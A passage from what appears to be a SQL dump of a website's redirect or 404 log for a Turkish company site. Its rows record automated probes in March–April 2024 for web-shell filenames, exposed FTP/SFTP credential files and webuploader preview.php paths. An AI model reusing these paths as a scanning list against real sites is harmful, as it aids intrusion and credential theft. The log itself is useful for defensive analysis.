00:00:00',301),(34314,'http://3s-technologies.com.tr/tr/bdiavkjcn.php',NULL,'http://3s-technologies.com.tr/bdiavkjcn.php','',1,0,'2024-03-24 11:39:23','0000-00-00 00:00:00',301),(34315,'http://3s-technologies.com.tr/tr/patchvuln4.php.suspected',NULL,'http://3s-technologies.com.tr/patchvuln4.php.suspected','',1,0,'2024-03-24 11:57:01','0000-00-00 00:00:00',301),(34316,'http://3s-technologies.com.tr/tr/tmp/tgjaplwqf.php.suspected',NULL,'http://3s-technologies.com.tr/tmp/tgjaplwqf.php.suspected','',2,0,'2024-03-24 12:21:44','0000-00-00 00:00:00',301),(34317,'http://3s-technologies.com.tr/tr/ker.php.suspected',NULL,'http://3s-technologies.com.tr/ker.php.suspected','',1,0,'2024-03-24 12:38:11','0000-00-00 00:00:00',301),(34318,'http://3s-technologies.com.tr/tr/images/stories/a.php',NULL,'http://3s-technologies.com.tr/images/stories/a.php','',1,0,'2024-03-24 12:51:37','0000-00-00 00:00:00',301),(34319,'http://3s-technologies.com.tr/tr/images/tgjaplwqf.php.suspected',NULL,'http://3s-technologies.com.tr/images/tgjaplwqf.php.suspected','',1,0,'2024-03-24 12:51:42','0000-00-00 00:00:00',301),(34320,'http://3s-technologies.com.tr/tr/hd.php.suspected',NULL,'http://3s-technologies.com.tr/hd.php.suspected','',1,0,'2024-03-24 12:55:45','0000-00-00 00:00:00',301),(34321,'http://3s-technologies.com.tr/tr/kmjadgqru.php.suspected',NULL,'http://3s-technologies.com.tr/kmjadgqru.php.suspected','',1,0,'2024-03-24 13:45:52','0000-00-00 00:00:00',301),(34322,'http://3s-technologies.com.tr/tr/nftkgnlpn.php.suspected',NULL,'http://3s-technologies.com.tr/nftkgnlpn.php.suspected','',2,0,'2024-03-24 13:45:53','0000-00-00 00:00:00',301),(34323,'http://3s-technologies.com.tr/tr/clsleakxjmsvj.php',NULL,'http://3s-technologies.com.tr/clsleakxjmsvj.php','',1,0,'2024-03-24 13:48:02','0000-00-00 00:00:00',301),(34324,'http://3s-technologies.com.tr/tr/mass.php.gif',NULL,'http://3s-technologies.com.tr/Mass.php.gif','',1,0,'2024-03-24 13:48:02','0000-00-00 00:00:00',301),(34325,'http://3s-technologies.com.tr/tr/kernel.php.gif',NULL,'http://3s-technologies.com.tr/kernel.php.gif','',1,0,'2024-03-24 13:48:16','0000-00-00 00:00:00',301),(34326,'http://3s-technologies.com.tr/tr/images/ahu_shell.php',NULL,'http://3s-technologies.com.tr/images/ahu_shell.php','',1,0,'2024-03-24 14:05:07','0000-00-00 00:00:00',301),(34327,'http://3s-technologies.com.tr/tr/tox.php.suspected',NULL,'http://3s-technologies.com.tr/tox.php.suspected','',1,0,'2024-03-24 14:22:02','0000-00-00 00:00:00',301),(34328,'https://3s-technologies.com.tr/tr/php/thinkphp/aaaffff123.php',NULL,'https://3s-technologies.com.tr/php/thinkphp/aaaffff123.php','',15,0,'2024-03-24 14:32:42','0000-00-00 00:00:00',301),(34329,'https://3s-technologies.com.tr/tr/index_sso.php',NULL,'https://3s-technologies.com.tr/index_sso.php','',15,0,'2024-03-24 14:32:43','0000-00-00 00:00:00',301),(34330,'http://3s-technologies.com.tr/tr/components/mass.php.gif',NULL,'http://3s-technologies.com.tr/components/Mass.php.gif','',1,0,'2024-03-24 14:38:38','0000-00-00 00:00:00',301),(34331,'http://3s-technologies.com.tr/tr/images/kmjadgqru.php.suspected',NULL,'http://3s-technologies.com.tr/images/kmjadgqru.php.suspected','',1,0,'2024-03-24 14:59:19','0000-00-00 00:00:00',301),(34332,'http://3s-technologies.com.tr/tr/plugins/editors/jce/tiny_mce/plugins/preview/js/wp-blockk.php',NULL,'http://3s-technologies.com.tr/plugins/editors/jce/tiny_mce/plugins/preview/js/wp-blockk.php','',1,0,'2024-03-24 15:34:43','0000-00-00 00:00:00',301),(34333,'http://3s-technologies.com.tr/tr/images/kaizer.php.suspected',NULL,'http://3s-technologies.com.tr/images/kaizer.php.suspected','',1,0,'2024-03-24 15:52:26','0000-00-00 00:00:00',301),(34334,'http://3s-technologies.com.tr/tr/images/c4kral.php.suspected',NULL,'http://3s-technologies.com.tr/images/c4kral.php.suspected','',1,0,'2024-03-24 15:54:00','0000-00-00 00:00:00',301),(34335,'http://3s-technologies.com.tr/tr/tgjaplwqf.php.suspected',NULL,'http://3s-technologies.com.tr/tgjaplwqf.php.suspected','',1,0,'2024-03-24 16:22:02','0000-00-00 00:00:00',301),(34336,'http://3s-technologies.com.tr/tr/tmp/kmjadgqru.php.suspected',NULL,'http://3s-technologies.com.tr/tmp/kmjadgqru.php.suspected','',1,0,'2024-03-24 16:56:06','0000-00-00 00:00:00',301),(34337,'http://3s-technologies.com.tr/tr/images/nftkgnlpn.php.suspected',NULL,'http://3s-technologies.com.tr/images/nftkgnlpn.php.suspected','',1,0,'2024-03-24 17:03:46','0000-00-00 00:00:00',301),(34338,'http://3s-technologies.com.tr/tr/0x55.php.suspected',NULL,'http://3s-technologies.com.tr/0x55.php.suspected','',1,0,'2024-03-24 17:11:33','0000-00-00 00:00:00',301),(34339,'http://3s-technologies.com.tr/tr/agt.php',NULL,'http://3s-technologies.com.tr/AGT.php','',2,0,'2024-03-24 17:11:51','0000-00-00 00:00:00',301),(34340,'http://3s-technologies.com.tr/tr/anjas.php',NULL,'http://3s-technologies.com.tr/anjas.php','',1,0,'2024-03-24 18:26:25','0000-00-00 00:00:00',301),(34341,'https://3s-technologies.com.tr/login.action',NULL,'','',1,0,'2024-03-24 20:29:22','0000-00-00 00:00:00',301),(34342,'http://3s-technologies.com.tr/tr/z.php.suspected',NULL,'http://3s-technologies.com.tr/z.php.suspected','',2,0,'2024-03-24 20:44:02','0000-00-00 00:00:00',301),(34343,'http://3s-technologies.com.tr/tr/images/stories/guys.php.phpgif',NULL,'http://3s-technologies.com.tr/images/stories/guys.php.phpgif','',1,0,'2024-03-24 20:46:56','0000-00-00 00:00:00',301),(34344,'http://3s-technologies.com.tr/tr/images/veufaqwex.php',NULL,'http://3s-technologies.com.tr/images/veufaqwex.php','',3,0,'2024-03-24 20:46:57','0000-00-00 00:00:00',301),(34345,'http://3s-technologies.com.tr/tr/tmp/veufaqwex.php',NULL,'http://3s-technologies.com.tr/tmp/veufaqwex.php','',2,0,'2024-03-24 20:47:44','0000-00-00 00:00:00',301),(34346,'http://3s-technologies.com.tr/tr/patchvuln5.php',NULL,'http://3s-technologies.com.tr/patchvuln5.php','',2,0,'2024-03-24 21:00:51','0000-00-00 00:00:00',301),(34347,'http://3s-technologies.com.tr/tr/xzour.php.suspected',NULL,'http://3s-technologies.com.tr/xzour.php.suspected','',1,0,'2024-03-24 21:03:04','0000-00-00 00:00:00',301),(34348,'http://3s-technologies.com.tr/tr/patchvuln4.php',NULL,'http://3s-technologies.com.tr/patchvuln4.php','',2,0,'2024-03-24 21:04:27','0000-00-00 00:00:00',301),(34349,'http://3s-technologies.com.tr/tr/vuln.php.suspected',NULL,'http://3s-technologies.com.tr/vuln.php.suspected','',2,0,'2024-03-24 21:04:33','0000-00-00 00:00:00',301),(34350,'http://3s-technologies.com.tr/tr/images/qdmmjjhda.php',NULL,'http://3s-technologies.com.tr/images/qdmmjjhda.php','',2,0,'2024-03-24 21:22:10','0000-00-00 00:00:00',301),(34351,'http://3s-technologies.com.tr/tr/veufaqwex.php',NULL,'http://3s-technologies.com.tr/veufaqwex.php','',2,0,'2024-03-24 21:22:11','0000-00-00 00:00:00',301),(34352,'http://3s-technologies.com.tr/tr/images/uckmnartd.php',NULL,'http://3s-technologies.com.tr/images/uckmnartd.php','',3,0,'2024-03-24 21:40:26','0000-00-00 00:00:00',301),(34353,'http://3s-technologies.com.tr/tr/tmp/qdmmjjhda.php',NULL,'http://3s-technologies.com.tr/tmp/qdmmjjhda.php','',2,0,'2024-03-24 21:40:26','0000-00-00 00:00:00',301),(34354,'http://3s-technologies.com.tr/tr/images/stories/csv.php.orion',NULL,'http://3s-technologies.com.tr/images/stories/csv.php.orion','',3,0,'2024-03-24 22:09:01','0000-00-00 00:00:00',301),(34355,'http://3s-technologies.com.tr/tr/tmp/uckmnartd.php',NULL,'http://3s-technologies.com.tr/tmp/uckmnartd.php','',2,0,'2024-03-24 22:33:40','0000-00-00 00:00:00',301),(34356,'http://3s-technologies.com.tr/tr/images/ofux1.php.suspected',NULL,'http://3s-technologies.com.tr/images/ofux1.php.suspected','',2,0,'2024-03-24 23:26:54','0000-00-00 00:00:00',301),(34357,'http://3s-technologies.com.tr/tr/uckmnartd.php',NULL,'http://3s-technologies.com.tr/uckmnartd.php','',4,0,'2024-03-25 01:14:25','0000-00-00 00:00:00',301),(34358,'http://3s-technologies.com.tr/tr/media/media/images/license.php',NULL,'http://3s-technologies.com.tr/media/media/images/license.php','',1,0,'2024-03-25 01:31:56','0000-00-00 00:00:00',301),(34359,'https://3s-technologies.com.tr:443/tr/.ds_store',NULL,'https://3s-technologies.com.tr:443/.DS_Store','',13,0,'2024-03-25 02:54:45','0000-00-00 00:00:00',301),(34360,'http://3s-technologies.com.tr/tr/images/stories/opa7.php',NULL,'http://3s-technologies.com.tr/images/stories/Opa7.php','',1,0,'2024-03-25 10:44:05','0000-00-00 00:00:00',301),(34361,'http://3s-technologies.com.tr/tr/hpchnozmg.php',NULL,'http://3s-technologies.com.tr/hpchnozmg.php','',2,0,'2024-03-25 10:45:04','0000-00-00 00:00:00',301),(34362,'http://3s-technologies.com.tr/tr/images/stories/403.php',NULL,'http://3s-technologies.com.tr/images/stories/403.php','',1,0,'2024-03-25 11:00:49','0000-00-00 00:00:00',301),(34363,'http://3s-technologies.com.tr/tr/images/stories/food.php',NULL,'http://3s-technologies.com.tr/images/stories/food.php','',1,0,'2024-03-25 11:02:28','0000-00-00 00:00:00',301),(34364,'http://3s-technologies.com.tr/tr/images/stories/9487da5cae.php',NULL,'http://3s-technologies.com.tr/images/stories/9487da5cae.php','',1,0,'2024-03-25 11:19:52','0000-00-00 00:00:00',301),(34365,'http://3s-technologies.com.tr/tr/includes/adsa.php',NULL,'http://3s-technologies.com.tr/includes/adsa.php','',2,0,'2024-03-25 11:20:03','0000-00-00 00:00:00',301),(34366,'http://3s-technologies.com.tr/tr/images/stories/petx.php',NULL,'http://3s-technologies.com.tr/images/stories/petx.php','',1,0,'2024-03-25 11:20:11','0000-00-00 00:00:00',301),(34367,'http://3s-technologies.com.tr/tr/images/stories/localhost.php',NULL,'http://3s-technologies.com.tr/images/stories/localhost.php','',1,0,'2024-03-25 11:34:28','0000-00-00 00:00:00',301),(34368,'http://3s-technologies.com.tr/tr/images/stories/xnight.php',NULL,'http://3s-technologies.com.tr/images/stories/xnight.php','',1,0,'2024-03-25 11:34:53','0000-00-00 00:00:00',301),(34369,'http://3s-technologies.com.tr/tr/images/stories/noteams.php',NULL,'http://3s-technologies.com.tr/images/stories/NoTeaMs.php','',1,0,'2024-03-25 11:51:03','0000-00-00 00:00:00',301),(34370,'http://3s-technologies.com.tr/tr/images/stories/configuration.php',NULL,'http://3s-technologies.com.tr/images/stories/configuration.php','',2,0,'2024-03-25 11:51:10','0000-00-00 00:00:00',301),(34371,'http://3s-technologies.com.tr/tr/ashell.php',NULL,'http://3s-technologies.com.tr/ashell.php','',1,0,'2024-03-25 12:12:47','0000-00-00 00:00:00',301),(34372,'http://3s-technologies.com.tr/tr/images/stories/p3tx.php',NULL,'http://3s-technologies.com.tr/images/stories/p3tx.php','',1,0,'2024-03-25 12:24:12','0000-00-00 00:00:00',301),(34373,'http://3s-technologies.com.tr/tr/images/stories/pagat.php',NULL,'http://3s-technologies.com.tr/images/stories/Pagat.php','',1,0,'2024-03-25 12:41:08','0000-00-00 00:00:00',301),(34374,'http://3s-technologies.com.tr/tr/tmp/trmp.php',NULL,'http://3s-technologies.com.tr/tmp/trmp.php','',1,0,'2024-03-25 12:41:13','0000-00-00 00:00:00',301),(34375,'http://3s-technologies.com.tr/tr/images/stories/bhl.php',NULL,'http://3s-technologies.com.tr/images/stories/bhl.php','',1,0,'2024-03-25 12:48:20','0000-00-00 00:00:00',301),(34376,'http://3s-technologies.com.tr/tr/images/stories/k4l0nk.php',NULL,'http://3s-technologies.com.tr/images/stories/k4l0nk.php','',1,0,'2024-03-25 12:48:26','0000-00-00 00:00:00',301),(34377,'http://3s-technologies.com.tr/tr/images/stories/tommy.php',NULL,'http://3s-technologies.com.tr/images/stories/tommy.php','',1,0,'2024-03-25 12:48:26','0000-00-00 00:00:00',301),(34378,'http://3s-technologies.com.tr/tr/images/stories/itil.php',NULL,'http://3s-technologies.com.tr/images/stories/itil.php','',1,0,'2024-03-25 13:14:40','0000-00-00 00:00:00',301),(34379,'http://3s-technologies.com.tr/tr/qwevvbagt.php',NULL,'http://3s-technologies.com.tr/qwevvbagt.php','',1,0,'2024-03-25 13:14:42','0000-00-00 00:00:00',301),(34380,'http://3s-technologies.com.tr/tr/images/stories/wawalo.php',NULL,'http://3s-technologies.com.tr/images/stories/wawalo.php','',1,0,'2024-03-25 13:41:36','0000-00-00 00:00:00',301),(34381,'http://3s-technologies.com.tr/tr/images/stories/xfile.php',NULL,'http://3s-technologies.com.tr/images/stories/xfile.php','',1,0,'2024-03-25 13:41:43','0000-00-00 00:00:00',301),(34382,'http://3s-technologies.com.tr/tr/images/stories/audhry.php',NULL,'http://3s-technologies.com.tr/images/stories/audhry.php','',1,0,'2024-03-25 13:41:45','0000-00-00 00:00:00',301),(34383,'http://3s-technologies.com.tr/tr/images/stories/possible.php',NULL,'http://3s-technologies.com.tr/images/stories/possible.php','',1,0,'2024-03-25 13:48:23','0000-00-00 00:00:00',301),(34384,'http://3s-technologies.com.tr/tr/images/stories/burung.php',NULL,'http://3s-technologies.com.tr/images/stories/burung.php','',1,0,'2024-03-25 14:04:57','0000-00-00 00:00:00',301),(34385,'http://3s-technologies.com.tr/tr/images/stories/viar.php',NULL,'http://3s-technologies.com.tr/images/stories/ViAr.php','',2,0,'2024-03-25 14:17:03','0000-00-00 00:00:00',301),(34386,'http://3s-technologies.com.tr/tr/images/stories/zink.php',NULL,'http://3s-technologies.com.tr/images/stories/zink.php','',1,0,'2024-03-25 14:21:53','0000-00-00 00:00:00',301),(34387,'http://3s-technologies.com.tr/tr/images/stories/x.php.orion',NULL,'http://3s-technologies.com.tr/images/stories/x.php.orion','',1,0,'2024-03-25 14:21:54','0000-00-00 00:00:00',301),(34388,'http://3s-technologies.com.tr/tr/images/stories/r.php.orion',NULL,'http://3s-technologies.com.tr/images/stories/r.php.orion','',1,0,'2024-03-25 14:35:24','0000-00-00 00:00:00',301),(34389,'http://3s-technologies.com.tr/tr/images/stories/tmp.php',NULL,'http://3s-technologies.com.tr/images/stories/tmp.php','',1,0,'2024-03-25 14:37:58','0000-00-00 00:00:00',301),(34390,'https://3s-technologies.com.tr/en/79-english-uk/88-eko-cnc-en',NULL,'','',3,0,'2024-03-25 15:01:12','0000-00-00 00:00:00',301),(34391,'http://3s-technologies.com.tr/tr/images/stories/iqre.php',NULL,'http://3s-technologies.com.tr/images/stories/iqre.php','',1,0,'2024-03-25 15:27:52','0000-00-00 00:00:00',301),(34392,'http://3s-technologies.com.tr/tr/images/stories/zoneh.php',NULL,'http://3s-technologies.com.tr/images/stories/zoneh.php','',1,0,'2024-03-25 16:02:51','0000-00-00 00:00:00',301),(34393,'http://3s-technologies.com.tr/tr/images/hpchnozmg.php',NULL,'http://3s-technologies.com.tr/images/hpchnozmg.php','',1,0,'2024-03-25 16:20:38','0000-00-00 00:00:00',301),(34394,'http://3s-technologies.com.tr/tr/images/stories/gay.php',NULL,'http://3s-technologies.com.tr/images/stories/gay.php','',2,0,'2024-03-25 16:20:41','0000-00-00 00:00:00',301),(34395,'http://3s-technologies.com.tr/tr/images/stories/cmd.php.pdf',NULL,'http://3s-technologies.com.tr/images/stories/cmd.php.pdf','',1,0,'2024-03-25 16:20:43','0000-00-00 00:00:00',301),(34396,'http://3s-technologies.com.tr/tr/images/stories/vito.php',NULL,'http://3s-technologies.com.tr/images/stories/vito.php','',1,0,'2024-03-25 16:49:27','0000-00-00 00:00:00',301),(34397,'http://3s-technologies.com.tr/tr/images/stories/umild.php',NULL,'http://3s-technologies.com.tr/images/stories/umild.php','',1,0,'2024-03-25 16:49:38','0000-00-00 00:00:00',301),(34398,'http://3s-technologies.com.tr/tr/images/stories/sekip.php',NULL,'http://3s-technologies.com.tr/images/stories/sekip.php','',1,0,'2024-03-25 16:56:01','0000-00-00 00:00:00',301),(34399,'http://3s-technologies.com.tr/tr/images/stories/bojog.php',NULL,'http://3s-technologies.com.tr/images/stories/bojog.php','',1,0,'2024-03-25 16:56:36','0000-00-00 00:00:00',301),(34400,'http://3s-technologies.com.tr/tr/images/stories/satria.php',NULL,'http://3s-technologies.com.tr/images/stories/satria.php','',1,0,'2024-03-25 17:38:53','0000-00-00 00:00:00',301),(34401,'http://3s-technologies.com.tr/tr/images/stories/myluph.php',NULL,'http://3s-technologies.com.tr/images/stories/myluph.php','',1,0,'2024-03-25 17:38:56','0000-00-00 00:00:00',301),(34402,'http://3s-technologies.com.tr/tr/images/stories/r.php..jpg',NULL,'http://3s-technologies.com.tr/images/stories/r.php..jpg','',1,0,'2024-03-25 17:47:48','0000-00-00 00:00:00',301),(34403,'http://3s-technologies.com.tr/tr/images/stories/lv.php.orion',NULL,'http://3s-technologies.com.tr/images/stories/lv.php.orion','',1,0,'2024-03-25 17:57:15','0000-00-00 00:00:00',301),(34404,'http://3s-technologies.com.tr/tr/images/stories/irwan.php',NULL,'http://3s-technologies.com.tr/images/stories/IrwaN.php','',2,0,'2024-03-25 18:05:02','0000-00-00 00:00:00',301),(34405,'http://3s-technologies.com.tr/tr/images/stories/indonesia.php',NULL,'http://3s-technologies.com.tr/images/stories/Indonesia.php','',1,0,'2024-03-25 19:33:33','0000-00-00 00:00:00',301),(34406,'http://3s-technologies.com.tr/tr/images/stories/blackunix.php',NULL,'http://3s-technologies.com.tr/images/stories/blackunix.php','',1,0,'2024-03-25 20:06:16','0000-00-00 00:00:00',301),(34407,'http://3s-technologies.com.tr/tr/tmp/ifaqvzbmn.php',NULL,'http://3s-technologies.com.tr/tmp/ifaqvzbmn.php','',1,0,'2024-03-25 20:24:00','0000-00-00 00:00:00',301),(34408,'http://3s-technologies.com.tr/tr/images/stories/arhy.php',NULL,'http://3s-technologies.com.tr/images/stories/arhy.php','',1,0,'2024-03-25 20:24:58','0000-00-00 00:00:00',301),(34409,'http://3s-technologies.com.tr/tr/wp-content/plugins/gotmls/readme.txt',NULL,'','',5,0,'2024-03-25 20:45:19','0000-00-00 00:00:00',301),(34410,'http://3s-technologies.com.tr/tr/images/stories/a.php.orion',NULL,'http://3s-technologies.com.tr/images/stories/a.php.orion','',1,0,'2024-03-25 20:59:33','0000-00-00 00:00:00',301),(34411,'http://3s-technologies.com.tr/tr/images/stories/iniziative/cmd..php',NULL,'http://3s-technologies.com.tr/images/stories/iniziative/cmd..php','',1,0,'2024-03-25 21:02:42','0000-00-00 00:00:00',301),(34412,'http://3s-technologies.com.tr/tr/8e090/index.php',NULL,'http://3s-technologies.com.tr/8e090/index.php','',1,0,'2024-03-25 21:16:33','0000-00-00 00:00:00',301),(34413,'http://3s-technologies.com.tr/tr/images/stories/spyden.php',NULL,'http://3s-technologies.com.tr/images/stories/spyden.php','',1,0,'2024-03-25 21:46:25','0000-00-00 00:00:00',301),(34414,'http://3s-technologies.com.tr/tr/images/stories/cron.php',NULL,'http://3s-technologies.com.tr/images/stories/cron.php','',1,0,'2024-03-25 22:43:43','0000-00-00 00:00:00',301),(34415,'http://3s-technologies.com.tr/tr/images/stories/extmod.php',NULL,'http://3s-technologies.com.tr/images/stories/extmod.php','',1,0,'2024-03-25 23:18:12','0000-00-00 00:00:00',301),(34416,'http://3s-technologies.com.tr/tr/images/stories/dante.php',NULL,'http://3s-technologies.com.tr/images/stories/dante.php','',3,0,'2024-03-25 23:52:41','0000-00-00 00:00:00',301),(34417,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-automatic/js/main-front.js',NULL,'','',2,0,'2024-03-28 01:27:18','0000-00-00 00:00:00',301),(34418,'http://3s-technologies.com.tr/en/hquldjwz.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2024-03-28 19:26:18','0000-00-00 00:00:00',301),(34419,'https://3s-technologies.com.tr/en/cmewouob.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2024-03-28 19:26:23','0000-00-00 00:00:00',301),(34420,'http://3s-technologies.com.tr/en/mah.php',NULL,'www.google.com','',100,0,'2024-03-31 22:09:03','0000-00-00 00:00:00',301),(34421,'https://3s-technologies.com.tr/en/wp-includes/wp-class.php',NULL,'www.google.com','',15,0,'2024-04-01 06:25:54','0000-00-00 00:00:00',301),(34422,'https://3s-technologies.com.tr/en/xl2023.php',NULL,'www.google.com','',3,0,'2024-04-01 06:25:55','0000-00-00 00:00:00',301),(34423,'http://3s-technologies.com.tr/tr/.ftpsync.setting',NULL,'','',4,0,'2024-04-03 06:07:31','0000-00-00 00:00:00',301),(34424,'http://3s-technologies.com.tr/tr/.sftp-config.json',NULL,'','',5,0,'2024-04-03 06:07:32','0000-00-00 00:00:00',301),(34425,'http://3s-technologies.com.tr/tr/ftpsync.setting',NULL,'','',4,0,'2024-04-03 06:07:34','0000-00-00 00:00:00',301),(34426,'http://3s-technologies.com.tr/tr/ftp-sync.json',NULL,'','',5,0,'2024-04-03 06:07:35','0000-00-00 00:00:00',301),(34427,'http://3s-technologies.com.tr/tr/.ftp-sync.json',NULL,'','',5,0,'2024-04-03 06:07:36','0000-00-00 00:00:00',301),(34428,'http://3s-technologies.com.tr/wp-json/litespeed/v1/cdn_status',NULL,'','',3,0,'2024-04-03 22:40:50','0000-00-00 00:00:00',301),(34429,'https://3s-technologies.com.tr/wp-json/litespeed/v1/cdn_status',NULL,'','',2,0,'2024-04-03 22:40:50','0000-00-00 00:00:00',301),(34430,'https://3s-technologies.com.tr/tr/app-ads.txt',NULL,'','',4,0,'2024-04-04 13:08:24','0000-00-00 00:00:00',301),(34431,'http://mail.3s-technologies.com.tr/en/robots.txt',NULL,'http://mail.3s-technologies.com.tr/robots.txt','',1,0,'2024-04-04 19:41:45','0000-00-00 00:00:00',301),(34432,'http://mail.3s-technologies.com.tr/en/sitemap.xml',NULL,'http://mail.3s-technologies.com.tr/sitemap.xml','',1,0,'2024-04-04 19:41:53','0000-00-00 00:00:00',301),(34433,'https://mail.3s-technologies.com.tr/en/robots.txt',NULL,'https://mail.3s-technologies.com.tr/robots.txt','',3,0,'2024-04-04 21:17:36','0000-00-00 00:00:00',301),(34434,'https://mail.3s-technologies.com.tr/en/sitemap.xml',NULL,'https://mail.3s-technologies.com.tr/sitemap.xml','',3,0,'2024-04-04 21:17:39','0000-00-00 00:00:00',301),(34435,'https://www.3s-technologies.com.tr/en/sitemap.xml',NULL,'https://www.3s-technologies.com.tr/sitemap.xml','',1,0,'2024-04-04 21:18:18','0000-00-00 00:00:00',301),(34436,'https://3s-technologies.com.tr/tr/simple.php',NULL,'https://3s-technologies.com.tr/simple.php','',6,0,'2024-04-06 00:40:57','0000-00-00 00:00:00',301),(34437,'http://www.3s-technologies.com.tr/tr/includes/libraries/preview.php',NULL,'http://www.3s-technologies.com.tr/includes/libraries/preview.php','',1,0,'2024-04-11 06:44:57','0000-00-00 00:00:00',301),(34438,'http://www.3s-technologies.com.tr/tr/classes/static/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/classes/static/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:45:10','0000-00-00 00:00:00',301),(34439,'http://www.3s-technologies.com.tr/tr/static/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/static/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:45:13','0000-00-00 00:00:00',301),(34440,'http://www.3s-technologies.com.tr/tr/public/assets/webuploader-master/server/preview.php',NULL,'http://www.3s-technologies.com.tr/public/assets/webuploader-master/server/preview.php','',1,0,'2024-04-11 06:45:16','0000-00-00 00:00:00',301),(34441,'http://www.3s-technologies.com.tr/tr/vendor/iisns/yii2-webuploader/assets/preview.php',NULL,'http://www.3s-technologies.com.tr/vendor/iisns/yii2-webuploader/assets/preview.php','',1,0,'2024-04-11 06:45:17','0000-00-00 00:00:00',301),(34442,'http://www.3s-technologies.com.tr/tr/public/assets/vendor/webuploader/server/preview.php',NULL,'http://www.3s-technologies.com.tr/public/assets/vendor/webuploader/server/preview.php','',1,0,'2024-04-11 06:45:25','0000-00-00 00:00:00',301),(34443,'http://www.3s-technologies.com.tr/tr/public/hui/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/public/hui/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:45:33','0000-00-00 00:00:00',301),(34444,'http://www.3s-technologies.com.tr/tr/public/back/widget/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/public/back/Widget/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:45:34','0000-00-00 00:00:00',301),(34445,'http://www.3s-technologies.com.tr/tr/uploader/preview.php',NULL,'http://www.3s-technologies.com.tr/uploader/preview.php','',1,0,'2024-04-11 06:45:41','0000-00-00 00:00:00',301),(34446,'http://www.3s-technologies.com.tr/tr/widget/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/Widget/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:45:43','0000-00-00 00:00:00',301),(34447,'http://www.3s-technologies.com.tr/tr/public/admin/widget/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/Public/Admin/Widget/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:45:49','0000-00-00 00:00:00',301),(34448,'http://www.3s-technologies.com.tr/tr/h-ui.admin/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/H-ui.admin/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:45:50','0000-00-00 00:00:00',301),(34449,'http://www.3s-technologies.com.tr/tr/vendor/webupload/server/preview.php',NULL,'http://www.3s-technologies.com.tr/vendor/webupload/server/preview.php','',1,0,'2024-04-11 06:45:57','0000-00-00 00:00:00',301),(34450,'http://www.3s-technologies.com.tr/tr/public/web/mysys/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/public/web/mysys/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:45:59','0000-00-00 00:00:00',301),(34451,'http://www.3s-technologies.com.tr/tr/src/main/resources/static/hui/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/src/main/resources/static/hui/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:46:05','0000-00-00 00:00:00',301),(34452,'http://www.3s-technologies.com.tr/tr/static/widget/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/static/Widget/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:46:08','0000-00-00 00:00:00',301),(34453,'http://www.3s-technologies.com.tr/tr/adminassets/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/AdminAssets/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:46:10','0000-00-00 00:00:00',301),(34454,'http://www.3s-technologies.com.tr/tr/public/js/hdjs/package/webuploader/server/preview.php',NULL,'http://www.3s-technologies.com.tr/public/js/hdjs/package/webuploader/server/preview.php','',1,0,'2024-04-11 06:46:11','0000-00-00 00:00:00',301),(34455,'http://www.3s-technologies.com.tr/tr/public/js/webuploader/server/preview.php',NULL,'http://www.3s-technologies.com.tr/Public/Js/Webuploader/server/preview.php','',1,0,'2024-04-11 06:46:18','0000-00-00 00:00:00',301),(34456,'http://www.3s-technologies.com.tr/tr/public/static/hadmin/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/public/static/hadmin/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:46:19','0000-00-00 00:00:00',301),(34457,'http://www.3s-technologies.com.tr/tr/public/agent/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/Public/agent/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:46:25','0000-00-00 00:00:00',301),(34458,'http://www.3s-technologies.com.tr/tr/public/admin/huiadmin/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/public/admin/huiadmin/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:46:28','0000-00-00 00:00:00',301),(34459,'http://www.3s-technologies.com.tr/tr/text/webuploader-0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/text/webuploader-0.1.5/server/preview.php','',1,0,'2024-04-11 06:46:35','0000-00-00 00:00:00',301),(34460,'http://www.3s-technologies.com.tr/tr/public/org/hdjs/package/webuploader/server/preview.php',NULL,'http://www.3s-technologies.com.tr/public/org/hdjs/package/webuploader/server/preview.php','',1,0,'2024-04-11 06:46:43','0000-00-00 00:00:00',301),(34461,'http://www.3s-technologies.com.tr/tr/application/index/view/layout/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/application/index/view/layout/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:46:54','0000-00-00 00:00:00',301),(34462,'http://www.3s-technologies.com.tr/tr/templates/main/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/templates/main/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:46:56','0000-00-00 